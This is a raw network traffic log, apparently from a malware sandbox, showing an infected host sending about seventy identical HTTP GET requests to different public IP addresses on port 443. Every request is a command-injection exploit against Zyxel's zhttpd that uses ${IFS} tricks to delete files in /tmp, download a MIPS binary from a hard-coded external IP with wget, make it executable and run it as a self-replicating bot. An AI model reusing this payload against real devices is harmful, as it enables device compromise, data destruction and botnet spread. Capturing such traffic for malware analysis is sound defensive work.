                        Mar 12, 2024 08:50:26.037398100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        816192.168.2.143573259.45.252.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.037519932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        817192.168.2.1454540191.40.152.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.037543058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        818192.168.2.1435810198.117.94.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.037605047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        819192.168.2.1435286198.239.80.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.037637949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        820192.168.2.145768648.47.235.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.037715912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        821192.168.2.1458602106.125.219.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.037785053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        822192.168.2.145966824.174.245.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033489943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        823192.168.2.1446452114.115.199.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033634901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        824192.168.2.1433860151.55.112.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033729076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        825192.168.2.1454722154.89.204.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033768892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        826192.168.2.1447432116.139.245.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033818007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        827192.168.2.145522699.111.62.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033863068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        828192.168.2.1449038107.93.39.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033910036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        829192.168.2.144811847.110.33.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033947945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        830192.168.2.1442962132.177.251.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.033987045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        831192.168.2.1450276222.130.127.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034049988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        832192.168.2.144373466.31.176.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034109116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        833192.168.2.143742659.120.125.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034167051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        834192.168.2.145394684.37.180.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034212112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        835192.168.2.1458574199.131.37.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034260988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        836192.168.2.1435872173.183.21.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034296036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        837192.168.2.143774693.187.158.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034333944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        838192.168.2.143631497.81.54.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034363031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        839192.168.2.145936231.196.237.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034403086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        840192.168.2.145295461.24.195.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034451962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        841192.168.2.145860491.227.54.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034490108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        842192.168.2.144608045.25.180.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034531116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        843192.168.2.143557450.52.243.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034599066 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        844192.168.2.1446458151.64.207.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034630060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        845192.168.2.1450056197.208.104.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034682989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        846192.168.2.1452388221.13.133.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034724951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        847192.168.2.143613638.105.205.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034782887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        848192.168.2.1448352146.31.53.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034835100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        849192.168.2.1452362123.208.89.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034898996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        850192.168.2.144569254.107.161.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034924030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        851192.168.2.1452990204.167.178.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.034985065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        852192.168.2.1452346123.146.18.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035022974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        853192.168.2.1437642110.26.204.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035063982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        854192.168.2.1441266134.125.140.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035116911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        855192.168.2.1440704166.248.22.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035154104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        856192.168.2.1446650170.246.69.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035224915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        857192.168.2.1438770140.183.90.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035271883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        858192.168.2.1449564178.92.37.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035314083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        859192.168.2.1441196143.1.255.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035389900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        860192.168.2.145418046.6.254.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035444975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        861192.168.2.143891453.247.59.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035495996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        862192.168.2.1453714113.110.91.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035547018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        863192.168.2.1445318146.160.165.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035598993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        864192.168.2.144145235.93.86.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035646915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        865192.168.2.1455500102.80.175.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035675049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        866192.168.2.1436356164.43.193.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035701990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        867192.168.2.1459852166.73.173.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035770893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        868192.168.2.144116471.166.223.146443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035795927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        869192.168.2.143824267.111.78.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035840034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        870192.168.2.1454110207.130.212.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035897017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        871192.168.2.14452382.94.161.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035945892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        872192.168.2.143724069.78.122.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.035991907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        873192.168.2.1446070196.185.185.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036056995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        874192.168.2.1451068147.194.156.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036078930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        875192.168.2.1455770202.255.49.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036163092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        876192.168.2.144111870.39.34.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036201954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        877192.168.2.1451250100.171.212.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036247015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        878192.168.2.1450396172.81.11.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036309004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        879192.168.2.1440474179.160.132.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036364079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        880192.168.2.1448642172.34.48.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036401033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        881192.168.2.145835439.86.91.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036452055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        882192.168.2.145430692.115.115.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036482096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        883192.168.2.1455004150.253.29.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036561012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        884192.168.2.1453720140.244.193.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036603928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        885192.168.2.143730020.49.233.137443
                        TimestampBytes transferredDirectionData
